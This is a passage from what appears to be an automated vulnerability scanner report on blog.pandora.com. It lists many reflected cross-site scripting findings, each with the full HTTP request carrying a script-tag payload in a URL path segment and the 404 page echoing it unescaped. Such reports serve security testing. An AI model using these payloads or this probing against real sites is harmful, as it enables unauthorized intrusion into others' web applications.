Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbbc81<script>alert(1)</script>8bbad4a334b/other_states/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e3b20<script>alert(1)</script>a06d1810695 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other_statese3b20<script>alert(1)</script>a06d1810695/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/other_statese3b20<script>alert(1)</script>a06d1810695/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a28a3<script>alert(1)</script>a45d2616222 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other_states/index.htmla28a3<script>alert(1)</script>a45d2616222 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/other_states/index.htmla28a3<script>alert(1)</script>a45d2616222 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e30d<script>alert(1)</script>9faee399280 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2e30d<script>alert(1)</script>9faee399280/archives/pennsylvania/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2e30d<script>alert(1)</script>9faee399280/archives/pennsylvania/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37daf<script>alert(1)</script>c2d02fb7876 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives37daf<script>alert(1)</script>c2d02fb7876/pennsylvania/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives37daf<script>alert(1)</script>c2d02fb7876/pennsylvania/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60d1f<script>alert(1)</script>2be1e057475 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/pennsylvania60d1f<script>alert(1)</script>2be1e057475/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 354
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/pennsylvania60d1f<script>alert(1)</script>2be1e057475/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a40f<script>alert(1)</script>859bfd370e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9a40f<script>alert(1)</script>859bfd370e9/archives/play-listen-repeat/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 360
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9a40f<script>alert(1)</script>859bfd370e9/archives/play-listen-repeat/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 604e5<script>alert(1)</script>75e75ebb353 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives604e5<script>alert(1)</script>75e75ebb353/play-listen-repeat/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives604e5<script>alert(1)</script>75e75ebb353/play-listen-repeat/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2f58<script>alert(1)</script>9cecf728f10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/play-listen-repeatd2f58<script>alert(1)</script>9cecf728f10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/play-listen-repeatd2f58<script>alert(1)</script>9cecf728f10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 410e8<script>alert(1)</script>b6acfa54d50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora410e8<script>alert(1)</script>b6acfa54d50/archives/rhode-island/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora410e8<script>alert(1)</script>b6acfa54d50/archives/rhode-island/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7510<script>alert(1)</script>e386b3405c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc7510<script>alert(1)</script>e386b3405c7/rhode-island/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc7510<script>alert(1)</script>e386b3405c7/rhode-island/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61a2b<script>alert(1)</script>066ab1d13fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/rhode-island61a2b<script>alert(1)</script>066ab1d13fc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/rhode-island61a2b<script>alert(1)</script>066ab1d13fc/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5b43<script>alert(1)</script>94fa79588e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae5b43<script>alert(1)</script>94fa79588e1/archives/roadtrip/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorae5b43<script>alert(1)</script>94fa79588e1/archives/roadtrip/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d8f8<script>alert(1)</script>102c29e82d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives3d8f8<script>alert(1)</script>102c29e82d/roadtrip/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives3d8f8<script>alert(1)</script>102c29e82d/roadtrip/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ccdb2<script>alert(1)</script>a59406e84d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtripccdb2<script>alert(1)</script>a59406e84d7/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/roadtripccdb2<script>alert(1)</script>a59406e84d7/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e73b<script>alert(1)</script>402d0eee6e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6e73b<script>alert(1)</script>402d0eee6e6/archives/roadtrip/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6e73b<script>alert(1)</script>402d0eee6e6/archives/roadtrip/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e3124<script>alert(1)</script>06bc8e10aef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese3124<script>alert(1)</script>06bc8e10aef/roadtrip/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese3124<script>alert(1)</script>06bc8e10aef/roadtrip/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94c76<script>alert(1)</script>fbd7c19bc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtrip94c76<script>alert(1)</script>fbd7c19bc2/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 359

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/roadtrip94c76<script>alert(1)</script>fbd7c19bc2/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3e61d<script>alert(1)</script>1df9109ab61 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtrip/index.html3e61d<script>alert(1)</script>1df9109ab61 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/roadtrip/index.html3e61d<script>alert(1)</script>1df9109ab61 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8354d<script>alert(1)</script>0b81ccc9992 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8354d<script>alert(1)</script>0b81ccc9992/archives/south-daktoa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
